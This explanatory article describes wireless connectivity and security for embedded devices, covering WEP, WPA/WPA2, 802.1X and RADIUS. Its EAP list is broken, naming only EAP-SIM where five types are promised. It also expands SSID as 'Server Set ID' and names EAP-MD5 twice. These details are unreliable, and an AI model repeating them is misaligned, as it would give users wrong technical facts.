Connecting devices like medical instruments, weigh scales, printers, sensors, and other embedded devices to wireless networks allows the user to gain unprecedented freedom and mobility without the need for cumbersome cabling. Traditionally, many of these devices have been confined to a certain area, and the applications have been prone to human error when used by someone to manually collect information and then transfer it to a computer.
Now that wireless networks are becoming ubiquitous, businesses are looking to connect all types of devices to the wireless network. Unfortunately, this capability is also susceptible to unauthorized users who can intercept data from outside of a building or area. That is because wireless networks use radio waves and radio waves can “leak” at distances up to 300 feet or even more. Therefore, everything on a network, including passwords, financial records, customer databases, and email, can theoretically be monitored and stolen by anyone with a laptop computer and wireless capabilities. As a result, businesses need additional levels of security on all devices on a wireless network over and above normal password protection, firewalls, and virus detections.
Device Connectivity Options
Keeping up with the standards in wireless networking (802.11a, 802.11b, 802.11g, and 802.11n, etc.), wireless security, and TCP/IP protocols (IPv6, SNMPv3, etc.) can be a monumental undertaking. Fortunately there are some options available for adding wireless capabilities to a device:
- Device Servers are dedicated intelligent products which typically connect to a device externally with a USB or Serial port. Software is also available that emulates a USB or Serial port on the computer; connecting to it allows existing applications to work without change.
- Those looking to incorporate wireless capabilities inside the device can use an Intelligent Network Module which can interface with an existing processor via a UART or SPI connection. It will still offload the device’s processor and operating system as it includes a processor, memory, networking stacks, hardware, and software dedicated to wireless connectivity.
- Higher volume manufacturers can utilize the existing processor and use embedded radio components with software on their system.
There are software package options for various network and wireless drivers, protocol stacks, and wireless security options available for many processor and operating systems. It is important to use an embedded connectivity solution that supports all of the major wireless networking standards while also providing security and programmability for integrating specialized functions.
Wireless Security Methods
In order to completely protect a wireless local area network, both encryption and authentication security procedures are needed:
- Encryption scrambles your data so that it is very difficult for someone to read unless they have the proper code known as a “key.”
- Authentication is a procedure that ensures a client has credentials to join the network.
The various encryption and authentication options available for wireless local area networks include WEP, SSID, WPA, and EAP among others. WEP, Shared Key and Open Systems Authentication, and SSID were the first generation of wireless security. The designers of the first wireless local area networks realized that security would be a major issue, so they incorporated both encryption and authentication capabilities into the original IEEE 802.11 standard.
These capabilities include:
- The Wired Equivalent Privacy protocol, or WEP, encryption
- Open System or Shared Key authentication
- Server Set ID (SSID or ESSID) network name
Unfortunately, weaknesses were found in static encryption key schemes and authentication security was almost nonexistent. WPA and WPA2 were designed as better ways to secure a wireless network. The Wi-Fi Alliance, a consortium of companies involved in 802.11 technology and services, realized that WEP security was not adequate, and consequently developed a more robust standard known as Wi-Fi Protected Access (WPA). The improvements of WPA include:
- Improved security of encryption keys via the Temporal Key Integrity Protocol (TKIP). Unlike the static WEP key, the key in WPA is dynamically changed (rekeyed), making it much more difficult for a hacker to decrypt a packet.
- Provision for strong authentication capabilities and key management via the IEEE 802.1X standard and a RADIUS authentication server.
WPA was designed to allow field upgrades of existing 802.11 products, but resulted in some inefficiencies and security compromises. To address the weaknesses in WPA, a second generation standard known as WPA2 was developed that uses the stronger and more efficient Advanced Encryption Standard (AES). WPA2 is a superset of WPA that is an implementation of the full IEEE 802.11i standard. Both WPA and WPA2 can operate in either of two modes:
- Pre-shared key mode (WPA-PSK or WPA2-PSK). This mode is designed for small home networks. In this mode, you create a key by manually entering a pass-phrase (also known as a shared secret) into each station and the access point. The static pre-shared key is then used to generate the dynamic keys that are used to encrypt the data, and is also used for authentication.
- Enterprise mode (WPA-Enterprise or WPA2-Enterprise). Enterprise mode is used for larger wireless networks. Rather than using a pre-shared key, the Enterprise mode uses a separate authentication server to generate master keys for the clients. The problem with WPA-PSK and WPA2-PSK encryption is the Pre-Shared Key, primarily because it is a single point of failure for network security that is vulnerable to hackers. In WPA-Enterprise and WPA2-Enterprise networks, there are three basic types of devices with roles defined by 802.1X:
- Supplicants. Supplicants include client devices like PCs, printers, and device servers.
- Authenticator. The authenticator (usually the access point) enforces authentication before allowing a supplicant to access network services. It passes authentication requests and responses to supplicants and the authentication server.
- Authentication Server. The authentication server is a special network server that contains a list of all users and their credentials. It verifies the user’s credentials whenever a supplicant attempts to connect to the network.
The authentication server, usually a RADIUS (Remote Authentication Dialin User Service) server, can be implemented as software on one of your servers (for example, Microsoft’s IAS software), as a dedicated network device, or as an embedded part of the access point. 802.1X is based on a protocol called EAP (Extensible Authentication Protocol) that is designed to be used in conjunction with a variety of different authentication protocols. This gives 802.1X (and consequently, WPA, WPA2, and 802.11b) the flexibility to handle new authentication capabilities as they emerge in the future. The WPA and WPA2 standards allow for five different types of EAP authentication:
- EAP-SIM Each of these types has advantages and disadvantages.
Other types of EAP include EAP-MD5 and the Cisco-proprietary LEAP and EAP-FAST protocols, and the EAP-MD5. Non-EAP security methods include Kerberos and Virtual Private Networks (VPNs). Since none of these methods are supported by the WPA or WPA2 standards and they offer little or no advantages, they should generally not be implemented for new wireless local area networks. With the emergence of wireless local area networks, wireless devices are becoming very popular because they allow devices to be mobile. Security is an issue with device servers because they often send and receive sensitive data, such as confidential patient medical information, using the same TCP/IP protocol as computers. Therefore, strong security is required to prevent unauthorized users from monitoring this information or using the device server to gain access to your network. Wireless networks are very vulnerable to unauthorized users because anyone can monitor the radio waves. Fortunately, the latest wireless security standards are very solid. Remember, you must implement strong security on all your wireless devices – not just your access point and computers – because your network’s security is only as strong as the weakest link.